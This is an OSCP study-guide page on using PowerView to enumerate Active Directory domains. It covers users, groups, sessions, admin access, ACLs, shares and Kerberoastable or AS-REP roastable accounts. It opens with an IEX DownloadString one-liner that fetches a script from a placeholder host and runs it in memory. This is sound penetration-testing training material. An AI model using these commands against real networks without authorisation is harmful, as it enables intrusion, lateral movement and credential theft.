Total OSCP GuidePayloads All The Things

πŸ”ŽPowerview

IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/PowerView.ps1')
Import-Module .\PowerView.ps1

loading module to powershell, if it gives error then change execution policy

  • Basic information about the domain:

Get-NetDomain

  • List of all users in the domain:

Get-NetUser

The above command's outputs can be filtered using "select" command. For example,

Get-NetUser | select cn

here cn is side-heading for the output of above command. we can select any number of them separated by comma.

  • Specific User

Get-NetUser "user"

  • Enumerate domain groups

Get-NetGroup

  • Information from specific group

Get-NetGroup "group name"

  • Enumerate the computer objects in the domain

Get-NetComputer

  • Scans the network in an attempt to determine if our current user has administrative permissions on any computers in the domain

Find-LocalAdminAccess

  • Checking logged on users with Get-NetSession, adding verbosity gives more info.

Get-NetSession -ComputerName files04 -Verbose

  • Listing SPN accounts in domain

Get-NetUser -SPN | select samaccountname,serviceprincipalname

  • Enumerates ACE(access control entities), lists SID(security identifier). ObjectSID

Get-ObjectAcl -Identity <user>

  • Converting SID/ObjSID to name

Convert-SidToName <sid/objsid>

  • Checking for "GenericAll" right for a specific group, after obtaining they can be converted using convert-sidtoname

Get-ObjectAcl -Identity "group-name" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

  • Find the shares in the domain

Find-DomainShare

  • Identifying AS-REP roastable accounts

Get-DomainUser -PreauthNotRequired -verbose

  • Kerberoastable accounts

Get-NetUser -SPN | select serviceprincipalname
PreviousAD Post Enumeration/ExploitationNextBloodhound

Last updated

Was this helpful?